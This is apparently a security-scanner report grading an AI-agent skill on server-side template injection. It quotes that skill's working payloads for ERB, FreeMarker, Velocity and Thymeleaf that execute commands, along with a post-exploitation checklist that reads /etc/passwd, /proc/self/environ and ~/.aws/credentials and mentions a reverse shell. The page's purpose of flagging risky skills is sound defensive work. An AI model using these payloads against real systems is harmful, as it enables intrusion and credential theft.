ssti-server-side-template-injection

github.com/yaklang/hack-skills

Verdict: Proceed with caution

0 critical4 high9 medium

SCORE 55 / 100

$skillox install ssti-server-side-template-injectionSoon

Why grade C?

score · 55 / 100

The current grade reflects 4 high-severity findings (3+ HIGHs → C).

0 CRIT4 HIGH9 MED0 LOW

To reach a higher grade

B
Reach Btarget score 75
Resolve 2 of 4 HIGH (cap is 2) + 4 of 9 MED (cap is 5).
A
Reach Atarget score 95
Resolve all 4 HIGH + 7 of 9 MED (cap is 2).

Thresholds are documented at /docs/grading. Source-of-truth is the grade() function in @skillox/scanner.

Latest scan findings

Scan crawl-uaeqbgwr2wdsr8wje7yir2a7 · Thu, 28 May 2026 17:27:37 GMT · 1ms

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 224CWE-552

▾

222<%= `id` %>

223<%= IO.popen('id').read %>

224<%= File.read('/etc/passwd') %>← sensitive path — credential-exfiltration vector

225```

226

high

Sensitive filesystem path referenced

The skill references a path (`\/proc\/self\/environ`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 276CWE-552

▾

274

275**Post-RCE pivot**:

2761. Read `/proc/self/environ` — env vars with credentials← sensitive path — credential-exfiltration vector

2772. Read application config files — DB passwords, API keys

2783. `cat ~/.aws/credentials` — cloud credentials

high

Sensitive filesystem path referenced

The skill references a path (`~\/\.aws\/`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 278CWE-552

▾

2761. Read `/proc/self/environ` — env vars with credentials

2772. Read application config files — DB passwords, API keys

2783. `cat ~/.aws/credentials` — cloud credentials← sensitive path — credential-exfiltration vector

2794. Reverse shell for persistence

280

high

Sensitive filesystem path referenced

The skill references a path (`\/etc\/passwd`) that contains credentials or system secrets. Reading this from an unsandboxed skill is a credential-exfiltration vector.

rule: filesystem-overreachline: 337CWE-552

▾

335When Flask **debug mode** (Werkzeug debugger) is exposed but **PIN-protected**, the PIN is derived from host-specific values. Typical inputs for public PIN calculation scripts:

336

3371. **`username`** — from `/etc/passwd` (the user running the Flask process)← sensitive path — credential-exfiltration vector

3382. **Module name** — often `flask.app` or `Flask`

3393. **Application path** — `app.py` or the real main filename

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 103CWE-78

▾

101{{''.__class__.__mro__[1].__subclasses__()}}

102

103# Find subprocess.Popen index (usually around 258-270, varies by Python version):← spawns a subprocess outside declared capabilities

104# Look for "subprocess.Popen" in the list

105

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 104CWE-78

▾

102

103# Find subprocess.Popen index (usually around 258-270, varies by Python version):

104# Look for "subprocess.Popen" in the list← spawns a subprocess outside declared capabilities

105

106# Execute command (replace [258] with correct index):

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 179CWE-78

▾

177```freemarker

178<#assign ob="freemarker.template.utility.ObjectConstructor"?new()>

179<#assign br=ob("java.io.BufferedReader",ob("java.io.InputStreamReader",ob("java.lang.Runtime")?api.exec("id").inputStream))>← spawns a subprocess outside declared capabilities

180${br.readLine()}

181```

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 205CWE-78

▾

203```velocity

204#set($str=$class.inspect("java.lang.Runtime").method.invoke($class.inspect("java.lang.Runtime").type, null))

205#set($run=$str.exec("id"))← spawns a subprocess outside declared capabilities

206#set($out=$run.inputStream)

207```

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 234CWE-78

▾

232```java

233// In th:text or th:fragment context:

234__${T(java.lang.Runtime).getRuntime().exec("id")}__::type← spawns a subprocess outside declared capabilities

235

236// Fragment expression context:

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 237CWE-78

▾

235

236// Fragment expression context:

237__${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec(new String[]{"/bin/sh","-c","id"}).getInputStream())}__::type← spawns a subprocess outside declared capabilities

238```

239

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 269CWE-78

▾

267├── FreeMarker → freemarker.template.utility.Execute?new()

268├── Twig → _self.env.registerUndefinedFilterCallback('exec')

269├── Velocity → java.lang.Runtime.exec()← spawns a subprocess outside declared capabilities

270├── ERB → <%= `cmd` %>

271├── Thymeleaf → T(java.lang.Runtime).getRuntime().exec()

med

Arbitrary subprocess execution detected

The skill spawns subprocesses. Without a capability manifest declaring this, the skill could execute arbitrary commands.

rule: subprocess-executionline: 271CWE-78

▾

269├── Velocity → java.lang.Runtime.exec()

270├── ERB → <%= `cmd` %>

271├── Thymeleaf → T(java.lang.Runtime).getRuntime().exec()← spawns a subprocess outside declared capabilities

272└── Angular CSTI → constructor.constructor('payload')()

273```

med

No capability manifest declared

The skill ships without a `manifest.yaml` or `capabilities` block in its frontmatter. Without a manifest, the runtime cannot enforce what this skill is permitted to do.

rule: no-manifest

▾

View latest scan →

skillox.io/c/ssti-server-side-template-injection

Skill facts

Latest grade: C · 55
Total scans: 1
Latest version: —
Last scanned: 2026-05-28
Source: yaklang/hack-skills

AIBOM

What this skill accesses

No manifest

Declared (from capabilities)

No capabilities block in frontmatter — the skill doesn't state what it should access.

Observed (from scan findings)

Subprocess invocations

# Find subprocess.Popen index (usually around 258-270, varies by Python version)
# Look for "subprocess.Popen" in the list
#set($run=$str.exec("id"))
<#assign br=ob("java.io.BufferedReader",ob("java.io.InputStreamReader",ob("java.
__${T(java.lang.Runtime).getRuntime().exec("id")}__::type
__${T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().
├── Thymeleaf → T(java.lang.Runtime).getRuntime().exec()
├── Velocity → java.lang.Runtime.exec()

Filesystem paths

/etc/passwd
/etc/passwd`
/proc/self/environ`
~/.aws/credentials`

AIBOM (Application Skills Bill of Materials) — see /docs/concepts/aibom for the format.

Version history

Only this scan

No other scans on record for this skill name. New scans appear here as the catalog re-crawls or creators request a re-scan.

Embed badge

Show this grade in your README.

Tracks the latest grade automatically. Updates within five minutes of every re-scan.

Markdown

[![SkillOx grade](https://api.skillox.io/badge/ssti-server-side-template-injection.svg)](https://skillox.io/c/ssti-server-side-template-injection)

Markdown · score

[![SkillOx score](https://api.skillox.io/badge/score/ssti-server-side-template-injection.svg)](https://skillox.io/c/ssti-server-side-template-injection)

HTML

<a href="https://skillox.io/c/ssti-server-side-template-injection"><img src="https://api.skillox.io/badge/ssti-server-side-template-injection.svg" alt="SkillOx grade"/></a>

reST

.. image:: https://api.skillox.io/badge/ssti-server-side-template-injection.svg
   :target: https://skillox.io/c/ssti-server-side-template-injection
   :alt: SkillOx grade

Coming soon

Creator verification badge, expert-review status, and Cosign-signed release attestation appear here as those layers ship. AIBOM + version history are live; the others follow once the creator portal completes its identity-proof + signing surface.